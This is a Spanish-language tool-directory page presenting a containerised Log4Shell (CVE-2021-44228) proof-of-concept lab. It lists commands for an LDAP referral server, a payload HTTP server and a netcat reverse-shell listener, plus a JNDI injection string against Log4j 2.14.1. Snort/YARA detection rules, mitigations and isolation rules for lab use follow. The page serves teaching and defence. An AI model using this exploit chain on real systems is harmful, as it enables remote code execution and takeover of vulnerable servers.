Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4Shell-PoC — **Log4Shell PoC es un entorno de explotación de alta fidelidad diseñado para replicar la vulnerabilidad CVE-2021-44228.** Proporciona un sandbox contenedorizado para demostrar la inyección JNDI, la redirección de referencias LDAP/RMI y la ejecución remota de código (RCE) a través de la librería Log4j 2. | Kitploit
Herramientas/GitHubGitHub/josemariamicoli/log4shell-poc
Análisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSExplotación de Aplicaciones WebComando y ControlAprendizaje y EducaciónRespuesta a IncidentesDesarrollo de PayloadsLabs y Práctica
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

Ver Repositorio
12hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

**Log4Shell PoC es un entorno de explotación de alta fidelidad diseñado para replicar la vulnerabilidad CVE-2021-44228.** Proporciona un sandbox contenedorizado para demostrar la inyección JNDI, la redirección de referencias LDAP/RMI y la ejecución remota de código (RCE) a través de la librería Log4j 2.

Compartir

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) PoC LAB
          [ PROOF OF CONCEPT & JNDI EXPLOITATION ]

Log4Shell PoC es un entorno de explotación de alta fidelidad diseñado para replicar la vulnerabilidad CVE-2021-44228. Proporciona un sandbox contenerizado para demostrar la inyección JNDI, la redirección de referencias LDAP/RMI y la ejecución remota de código (RCE) mediante la librería Log4j 2.


⚠️ DESCARGO DE RESPONSABILIDAD

Solo para fines educativos y de pruebas de seguridad autorizadas.

El uso de esta prueba de concepto para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los autores no asumen ninguna responsabilidad y no son responsables de ninguna pérdida de datos, daños al sistema, consecuencias legales o uso indebido causado por este programa. Al usar este software, usted acepta operar dentro de los límites legales de su jurisdicción.



Sección 2: Capacidades y Estructura del Proyecto

🚀 Capacidades del PoC

  • Inyección JNDI: Punto de entrada vulnerable en Log4j 2.14.1.
  • Servidor de Referencia LDAP: Redirección LDAP maliciosa mediante Marshalsec.
  • Carga Remota de Clases: Entrega por HTTP de bytecode Java compilado.
  • Payload Multi-Etapa: Ejecución de reverse shell nativa de Java.
  • Pruebas de Evasión: Bypasses de TrustURLCodebase y FormatMsgNoLookups.

🛠 Estructura del PoC

🛰 Infraestructura Maliciosa (Atacante)

El lado del atacante consta de tres canales distintos para facilitar el PoC.

  • Redireccionador LDAP (Puerto 1389): Construido sobre Marshalsec, dirige la solicitud JNDI de la víctima al exploit alojado.
  • Servidor HTTP de Payload (Puerto 8888): Aloja el bytecode Exploit.class para que la víctima lo descargue y ejecute.
  • Listener de NC (Puerto 9001): El destino final de callback para la reverse shell.

💻 Instancia Vulnerable (Víctima)

Un entorno Dockerizado con OpenJDK 8 que ejecuta una implementación vulnerable de Log4j.

  • Log4j v2.14.1: La versión de la librería objetivo.
  • VulnerableLog.java: Una aplicación Java simple que registra la entrada proporcionada por el usuario sin saneamiento.


Sección 3: Instrucciones de Configuración y Ejecución

⚙️ Configuración y Ejecución

1. Configuración del Atacante (Arch Linux)

Pestaña 1: Servidor de Referencia LDAP

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

Pestaña 2: Entrega del Payload por HTTP

root@kitploit:~
# Inicie el servidor Python en el directorio que contiene Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

Pestaña 3: Listener de Netcat

root@kitploit:~
nc -lvnp 9001

2. Ejecución de la Víctima

Pestaña 4: Lanzar Contenedor Vulnerable

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

Dentro del Contenedor: Ejecutar el PoC

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



Sección 4: Detección y Mitigación

🔍 Detección y Monitoreo Defensivo

1. Detección de Red (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. Detección Basada en Registros (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 Matriz de Respuesta a Incidentes (IR)

FaseTécnica¿Alerta Activada?MITRE ATT&CK
Acceso InicialExplotación de Aplicación Expuesta al Público[ ]T1190
EjecuciónIntérprete de Comandos y Scripts[ ]T1059
Comando y ControlProtocolo de Capa de Aplicación (LDAP)[ ]T1071.003
ExfiltraciónProtocolo de Capa No Aplicacional[ ]T1048

🔒 Mitigación y Endurecimiento

  1. Actualización: Actualice a Log4j 2.17.1 o superior.
  2. Flag de JVM: Establezca -Dlog4j2.formatMsgNoLookups=true para deshabilitar las búsquedas (lookups).
  3. Eliminación de Clase: Elimine manualmente JndiLookup.class del JAR log4j-core.

🔒 Reglas de Enfrentamiento

  1. Aislamiento: Fije las IPs objetivo al puente interno de Docker (172.17.0.0/16).
  2. Red: Asegúrese de utilizar ÚNICAMENTE redes de VM internas o de solo anfitrión (Host-Only).
  3. Seguridad C2: No exponga los servidores Python o LDAP a la Internet pública.

Descargar herramienta